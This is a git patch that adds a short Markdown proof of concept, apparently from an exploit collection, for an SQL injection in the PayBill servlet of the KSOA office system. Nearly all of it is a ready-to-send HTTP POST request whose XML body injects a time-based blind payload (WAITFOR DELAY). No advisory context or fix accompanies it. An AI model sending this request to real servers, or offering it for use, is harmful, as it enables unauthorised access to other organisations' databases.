From cd16cee06983b479ec50bfd585ba9dda9fb71091 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Sat, 19 Aug 2023 20:27:33 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E6=9F=90=E5=8F=8B=E6=97=B6=E7=A9=BAKS?= =?UTF-8?q?OA=20PayBill=20SQL=E6=B3=A8=E5=85=A5=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- 某友时空KSOA PayBill SQL注入漏洞.md | 11 +++++++++++ 1 file changed, 11 insertions(+) create mode 100644 某友时空KSOA PayBill SQL注入漏洞.md diff --git a/某友时空KSOA PayBill SQL注入漏洞.md b/某友时空KSOA PayBill SQL注入漏洞.md new file mode 100644 index 0000000..a158cfc --- /dev/null +++ b/某友时空KSOA PayBill SQL注入漏洞.md @@ -0,0 +1,11 @@ +## 某友时空KSOA PayBill SQL注入漏洞 +``` +POST /servlet/PayBill?caculate&_rnd= HTTP/1.1 +Host: 1.1.1.1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 +Content-Length: 134 +Accept-Encoding: gzip, deflate +Connection: close + +11'WAITFOR DELAY '00:00:03';-1102360 +```